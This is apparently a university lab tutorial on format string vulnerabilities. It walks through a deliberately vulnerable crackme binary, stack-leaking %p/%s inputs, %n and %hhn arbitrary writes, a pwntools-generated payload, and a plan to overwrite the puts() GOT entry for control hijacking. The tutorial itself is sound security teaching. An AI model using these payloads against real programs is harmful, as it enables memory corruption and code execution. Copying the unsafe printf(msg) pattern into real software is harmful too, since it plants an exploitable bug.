Tut05: Format String Vulnerability
In this tutorial, we will explore a powerful new class of bug, called format string vulnerability. This benign-looking bug allows arbitrary read/write and thus arbitrary execution.
Step 0. Enhanced crackme0x00
We've eliminated the buffer overflow vulnerability in the crackme0x00 binary. Let's check out the new implementation!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <err.h>
#include "flag.h"
unsigned int secret = 0xdeadbeef;
void handle_failure(char *buf) {
char msg[100];
snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
printf(msg);
}
int main(int argc, char *argv[])
{
setreuid(geteuid(), geteuid());
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
int tmp = secret;
char buf[100];
printf("IOLI Crackme Level 0x00\n");
printf("Password:");
fgets(buf, sizeof(buf), stdin);
if (!strcmp(buf, "250382\n")) {
printf("Password OK :)\n");
} else {
handle_failure(buf);
}
if (tmp != secret) {
puts("The secret is modified!\n");
}
return 0;
}
$ checksec --file crackme0x00
[*] '/home/lab05/tut05-fmtstr/crackme0x00'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
As you can see, it is a fully protected binary.
NOTE. These two lines are to make your life easier; they immediately flush your input and output buffers.
setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0);
It works as before, but when we type an incorrect password, it produces an error message like this:
$ ./crackme0x00
IOLI Crackme Level 0x00
Password:asdf
Invalid Password! asdf
Unfortunately, this program is using printf()
in a very insecure way.
snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
printf(msg);
Please note that msg
might contain your input (e.g., invalid
password). If it contains a special format specifier, like %
,
printf()
interprets its format specifier, causing a security issue.
Let's try typing %p
:
%p
: pointer%s
: string%d
: int%x
: hex
$ ./crackme0x00
IOLI Crackme Level 0x00
Password:%p
Invalid Password! 0x64
What's 0x64
as an integer? guess what does it represent in the code?
Let's go crazy by putting more %p
x 15
$ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p" | ./crackme0x00
Password:Invalid Password! 1=0x64|2=0x8048a40|3=0xffe1f428 ...
In fact, this output string is your stack for the printf call:
1=0x64
2=0x8048a40
3=0xffe1f428
4=0xf7f3ce89
...
10=0x61766e49
11=0x2064696c
12=0x73736150
13=0x64726f77
14=0x3d312021
15=0x327c7025
Since it's so tedious to keep putting %p
, printf-like functions
provide a convenient way to point to the n-th arguments:
| %[nth]$p
(e.g., %1$p = first argument)
Let's try:
$ echo "%10\$p" | ./crackme0x00
IOLI Crackme Level 0x00
Password:Invalid Password! 0x61766e49
NOTE.
\\$
is to avoid the interpretation (e.g.,$PATH
) by the shell.
It matches the 10th stack value listed above.
Step 1. Format String Bug to an Arbitrary Read
Let's exploit this format string bug to write an arbitrary value to an arbitrary memory region.
Have you noticed some interesting values in the stack?
4=0xf7f3ce89
...
10=0x61766e49 'Inva'
11=0x2064696c 'lid '
12=0x73736150 'Pass'
13=0x64726f77 'word'
14=0x3d312021 '! 1='
15=0x327c7025 '%p|2'
It seems that what we put onto the stack is actually being interpreted as an argument. What's going on?
When you invoke a printf()
function, your arguments passed through the
stack are placed like these:
printf("%s", a1, a2 ...)
[ra]
[ ] --+
[a1] | a1: 1st arg, %1$s
[a2] | a2: 2nd arg, %2$s
[%s] <-+ : 3rd arg, %3$s
[..]
In this simple case, you can point to the %s
(as value) with
%3$s
! It means you can 'read' (e.g., 4 bytes) an arbitrary memory
region like this:
printf("\xaa\xaa\xaa\xaa%3$s", a1, a2 ...)
[ra ]
[ ] --+
[a1 ] |
[a2 ] |
[ptr] <-+
[.. ]
It reads (%s
) 4 bytes at 0xaaaaaaaa and prints out its value. In case
of the target binary, where is your controllable input located in
the stack (the N value in the below)?
$ echo "BBAAAA%N\$p" | ./crackme0x00
IOLI Crackme Level 0x00
Password:Invalid Password! BBAAAA0x41414141
What happens when we replace %p
with %s
? How does it crash?
You can examine the stack to understand how the format string bug works. As you can see, your entire input data "AABBBB" is stored at 3th and 7th entry of the stack and BBBB" is stored at 15th entry.
pwndbg> x/100i handle_failure
0x804880b <handle_failure>: push ebp
0x804880c <handle_failure+1>: mov ebp,esp
0x804880e <handle_failure+3>: sub esp,0x88
...
0x8048841 <handle_failure+54>: push eax
0x8048842 <handle_failure+55>: call 0x8048520 <printf@plt>
pwndbg> b *0x8048842
Breakpoint 1 at 0x8048842: file crackme0x00.c, line 14.
pwndbg> r
Starting program: /home/lab05/tut05-fmtstr/crackme0x00 AAAABBBBCCCC
IOLI Crackme Level 0x00
Password:AABBBB
pwndbg> stack 30
00:0000│ esp 0xffd86b50 -> 0xffd86b78 <- 0x61766e49 ('Inva')
01:0004│ 0xffd86b54 <- 0x64 /* 'd' */
02:0008│ 0xffd86b58 -> 0x8048a40 <- dec ecx
03:000c│ 0xffd86b5c -> 0xffd86c18 <- 'AABBBB\n'
04:0010│ 0xffd86b60 -> 0xf7f0eeb9
05:0014│ 0xffd86b64 <- 0x1
06:0018│ 0xffd86b68 <- 0x0
07:001c│ 0xffd86b6c -> 0xffd86c18 <- 'AABBBB\n'
08:0020│ 0xffd86b70 -> 0x804a00c (_GLOBAL_OFFSET_TABLE_+12)
09:0024│ 0xffd86b74 -> 0xf7f14028 (_dl_fixup+184)
0a:0028│ eax 0xffd86b78 <- 0x61766e49 ('Inva')
0b:002c│ 0xffd86b7c <- 0x2064696c ('lid ')
0c:0030│ 0xffd86b80 <- 0x73736150 ('Pass')
0d:0034│ 0xffd86b84 <- 'word! AABBBB\n\n'
0e:0038│ 0xffd86b88 <- '! AABBBB\n\n'
=> 0f:003c│ 0xffd86b8c <- 'BBBB\n\n'
You can check this by your self. You can see that dereferencing the 15th stack entry causes segmentation fault because the value in the 15th entry is not a pointer but a raw string "BBBB".
lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%3$s
Invalid Password! AABBBBAABBBB%3$s
lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%7$s
Invalid Password! AABBBBAABBBB%7$s
lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%15$s
Segmentation fault (core dumped)
What happen if you replace the "BBBB" to a valid address and try to dereference the string again (i.e., %15$s)?
[Task] How could you read the
secret
value?Note that you can locate the address of secret by using
nm
:$ nm crackme0x00 | grep secret 0804a050 D secret
Step 2. Format String Bug to an Arbitrary Write
In fact, printf()
is very complex, and it supports a 'write': it
writes the total number of bytes printed so far to the location you
specified.
%n
: write number of bytes printed (as an int)
printf("aaaa%n", &len);
len
contains 4
= strlen("aaaa")
as a result.
Similar to the arbitrary read, you can also write to an arbitrary memory location like this:
printf("\xaa\xaa\xaa\xaa%3$n", a1, a2 ...)
[ra ]
[ ] --+
[a1 ] |
[a2 ] |
[ptr] <-+
[.. ]
*0xaaaaaaaa = 4 (i.e., \xaa x 4 are printed so far)
Then, how to write an arbitrary value? We need another useful specifier of printf:
| %[len]d
(e.g., %10d: print out 10 spacers)
To write 10 to 0xaaaaaaaa
, you can print 6 more characters like this:
printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2 ...)
---
*0xaaaaaaaa = 10
By using this, you can write an arbitrary value to the arbitrary
location. For example, you can write a value, 0xc0ffee, to the
location, 0xaaaaaaaa
:
1. You can either write four bytes at a time like this:
*(int *)0xaaaaaaaa = 0x000000ee
*(int *)0xaaaaaaab = 0x000000ff
*(int *)0xaaaaaaac = 0x000000c0
2. Or you can use these smaller size specifiers like below:
%hn
: write the number of printed bytes as a short%hhn
: write the number of printed bytes as a byte
printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2 ...)
---
*(unsigned char*)0xaaaaaaaa = 0x10
so,
*(unsigned char*)0xaaaaaaaa = 0xee
*(unsigned char*)0xaaaaaaab = 0xff
*(unsigned char*)0xaaaaaaac = 0xc0
[Task] How could you overwrite the
secret
value with 0xc0ffee?
Step 3. Using pwntool
In fact, it's very tedious to construct the format string that overwrites an arbitrary value to an arbitrary location once you understand the core idea. Fortunately, pwntool provides a fmtstr exploit generator for you.
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
- offset: the first formatter's offset you control
- writes: dict with addr, value {addr: value, addr2: value2}
- numbwritten: the number of bytes already written by printf()
Let's say we'd like to write 0xc0ffee
to *0xaaaaaaaa
, and we have a
control of the fmtstr at the 4th param (i.e., %4$p
), but we already
printed out 10 characters.
$ python2 -c "from pwn import*; print(fmtstr_payload(4, {0xaaaaaaaa: 0xc0ffee}, 10))"
\xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa\xad\xaa\xaa\xaa%212c%4$hhn%17c%5$hhn%193c%6$hhn%64c%7$hhn
[Task] Is it similar to what you've come up with to write 0xc0ffee to the
secret
value? Please modify template.py to overwrite thesecret
value!
Step 4. Arbitrary Execution!
Your task today is to launch an control hijacking attack by using this
fmtstr vulnerability. The plan is simple: overwrite the GOT of puts()
with the address of print_key()
, so that when puts()
is invoked, we can
redirect its execution to print_key()
.
Just in case, you haven't heard of GOT. Global Offset Table, shortly
GOT, is a table whose entry contains an external function pointer
(e.g., puts()
or printf()
in libc). When a dynamic loader (ld)
initially loads your program, the GOT table is filled with static code
pointers that ultimately invoke _dl_runtime_resolve()
, and then, once
the location of the calling function is resolved, the entry is updated
with the resolved pointer (i.e., real address of puts()
and printf()
in
libc). Once resolved, the following calls will immediately direct its
execution to the real functions, as the resolved function pointer is
updated in the GOT entry.
For example, this is the code snippet for calling puts()
in the main()
:
0x0804891b <+189>: sub esp,0xc
0x0804891e <+192>: push 0x8048a80
0x08048923 <+197>: call 0x8048590 <puts@plt>
Note that puts@plt
is not the real "puts()
" in libc; 0x80490a0
is in
your code section (try, vmmap 0x80490a0
) and the real puts()
of libc
is located here:
> x/10i puts
0xf7db7b40 <puts>: push ebp
0xf7db7b41 <puts+1>: mov ebp,esp
0xf7db7b43 <puts+3>: push edi
0xf7db7b44 <puts+4>: push esi
puts@plt
means puts
at the Procedure Linkage Table (PLT); it points
to one of the entries in PLT:
> pdisas 0x8048570
> 0x8048570 <err@plt> jmp dword ptr [_GLOBAL_OFFSET_TABLE_+36] <0x804a024>
0x8048576 <err@plt+6> push 0x30
0x804857b <err@plt+11> jmp 0x8048500
0x8048580 <fread@plt> jmp dword ptr [_GLOBAL_OFFSET_TABLE_+40] <0x804a028>
0x8048586 <fread@plt+6> push 0x38
0x804858b <fread@plt+11> jmp 0x8048500
0x8048590 <puts@plt> jmp dword ptr [0x804a02c] <0xf7db7b40>
0x8048596 <puts@plt+6> push 0x40
0x804859b <puts@plt+11> jmp 0x8048500
...
Let's follow this call (i.e., single stepping into the call),
> 0x8048590 <puts@plt> jmp dword ptr [_GLOBAL_OFFSET_TABLE_+44] <0x804a02c>
0x8048596 <puts@plt+6> push 0x40
0x804859b <puts@plt+11> jmp 0x8048500
v
0x8048500 push dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804a004>
0x8048506 jmp dword ptr [0x804a008]
v
0xf7fafe10 <_dl_runtime_resolve> push eax
0xf7fafe11 <_dl_runtime_resolve+1> push ecx
0xf7fafe12 <_dl_runtime_resolve+2> push edx
GOT of puts()
(i.e., _GLOBAL_OFFSET_TABLE_+44
) initially points to
puts@plt+6
, the right next instruction to puts@plt
, and ends up invoking
_dl_runtime_resolve()
with two parameters, one of which simply
indicates that puts()
should be resolved (i.e., 0x30). Once resolved,
_GLOBAL_OFFSET_TABLE_+44
(0x804a02c
) will point to the real puts()
in
libc (0xf7e11b40
).
[Task] So, can you overwrite the GOT entry of
puts()
, and try to hijack by yourself?
In fact, there are two challenges that you will be encountering when writing an exploit.
1) in order to reach puts()
, you have to overwrite both the secret value and the GOT of puts()
:
if (tmp != secret) {
puts("The secret is modified!\n");
}
[Task] What should be the 'writes' param for
fmtstr_payload()
?
2) Unfortunately, the size of the buffer is very limited, meaning that it might not be able to contain the format strings for both write targets.
void handle_failure(char *buf) {
char msg[100];
...
}
Do you remember the %hn
or %hhn
tricks that help you overwrite smaller
number of bytes, like one or two? That's where write_size
plays a role:
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
- write_size (str): must be byte, short or int. Tells if you want to
write byte by byte, short by short or int by int (hhn, hn or n)
Finally! Can you hijack the puts()
invocation to print_key()
to get
your flag for this tutorial?
[Task] In the given
template.py
, modify the payload to hijack theputs()
invocation toprint_key()
, and get your flag.